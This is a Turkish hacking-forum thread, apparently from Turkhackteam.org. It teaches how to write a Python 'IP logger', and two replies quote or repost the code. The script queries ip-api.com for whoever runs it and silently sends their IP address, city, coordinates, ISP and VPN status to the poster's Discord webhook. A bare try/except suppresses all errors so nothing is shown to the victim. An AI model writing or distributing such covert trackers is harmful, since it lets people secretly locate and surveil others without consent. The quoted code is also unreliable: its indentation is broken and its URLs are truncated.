Python ile basit ip logger

pacpac1

Yeni üye
13 Ağu 2023
38
4
Cümleten selamün aleyküm, başlıktan da görebileceğiniz gibi bugün python ile basit bir ip logger yapmayı öğreteceğim.

Gerekli araç: Python buradan yükleyebilirsiniz Download Python

İlk olarak bir dosya oluşturuyoruz, istediğiniz dosya adını verebilirsiniz ancak uzantı.py olacak
Ben main.py diyorum.

Dosya çalıştırıldığında ip adresini discord webhook yoluyla yollamasını istiyorum.

Şimdi kodlamaya başlayalım:

import requests #ip adresini aldıktan sonra bu modülü kullanarak ip adresini webhook ile yollayacağız

webhook = "webhookunuzu_girin"

def ip(): # def kodu pythonda bir komudu tanıtmak gibidir
try:
api = "http://ip-api.com/json/?fields=stat...y,zip,lat,lon,timezone,isp,org,as,proxy,query" # bu siteye istek yollayacağız o da ip adresini gösterecek
data = requests.get(api).json() # Bununla site çıktısını alıyoruz (sitenin gösterdiği şey yani çıktısı ip adresi olduğu için ip adresini gösterecek)
content = f"```Basit IP Logger \nIP: {data['query']}\nRegion: {data['regionName']}\nBölge: {data['city']}\nEnlem: {data['lat']}\nBoylam: {data['lon']}\nISP: {data['isp']}\nVPN?: {data['proxy']}```Basit IP Logger" # Bununla webhook ile gönderilecek mesajı yapılandırıyoruz.
requests.post(webhook, json={"avatar_url":"https://cdn.discordapp.com/attachme...dbf1b4e1d61f6079f8a117141914c2c2f717849c8524&",'username': 'Basic IP Logger Bot', 'content': content}) # Bununla da yaz önce yapılandırdığımız mesajı webhook ile yolluyoruz
except:
pass
ip()

eğer kodda IndentationError: unexpected indent hatası alırsanız bu siteye gidip kodu yapıştırın, çıkan sonuçla kodu güncelleyin site: Python Formatter and Beautifier

Profesyonel felan değilim herkes yapabilir ama bi like alırım :)

Son düzenleme:

Homax

Üye
9 Ocak 2023
57
15
Cümleten selamün aleyküm, başlıktan da görebileceğiniz gibi bugün python ile basit bir ip logger yapmayı öğreteceğim.

İlk olarak bir dosya oluşturuyoruz, istediğiniz dosya adını verebilirsiniz ancak uzantı.py olacak
Ben main.py diyorum.

Dosya çalıştırıldığında ip adresini discord webhook yoluyla yollamasını istiyorum.

import requests #ip adresini aldıktan sonra bu modülü kullanarak ip adresini webhook ile yollayacağız

try:
api = "http://ip-api.com/json/?fields=stat...y,zip,lat,lon,timezone,isp,org,as,proxy,query" # bu siteye istek yollayacağız o da ip adresini gösterecek
data = requests.get(api).json() # Bununla site çıktısını alıyoruz (sitenin gösterdiği şey yani çıktısı ip adresi olduğu için ip adresini gösterecek)
content = f"```Basit IP Logger \nIP: {data['query']}\nRegion: {data['regionName']}\nBölge: {data['city']}\nEnlem: {data['lat']}\nBoylam: {data['lon']}\nISP: {data['isp']}\nVPN?: {data['proxy']}```Basit IP Logger" # Bununla webhook ile gönderilecek mesajı yapılandırıyoruz.
requests.post(webhook, json={"avatar_url":"https://cdn.discordapp.com/attachme...dbf1b4e1d61f6079f8a117141914c2c2f717849c8524&",'username': 'Demeter IP Logger Bot', 'content': content}) # Bununla da yaz önce yapılandırdığımız mesajı webhook ile yolluyoruz
except:
pass
ip()

eğer kodda IndentationError: unexpected indent hatası alırsanız bu siteye gidip kodu yapıştırın, çıkan sonuçla kodu güncelleyin site: Python Formatter and Beautifier

Eline sağlık

27 May 2023
188
44

Ben main.py diyorum.

try:
requests.post(webhook, json={"avatar_url":"https://cdn.discordapp.com/attachme...dbf1b4e1d61f6079f8a117141914c2c2f717849c8524&",'username': 'Demeter IP Logger Bot', 'content': content}) # Bununla da yaz önce yapılandırdığımız mesajı webhook ile yolluyoruz
except:
pass
ip()

Güzel Ve Detaylı Konu Olmuş Eline Sağlık

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.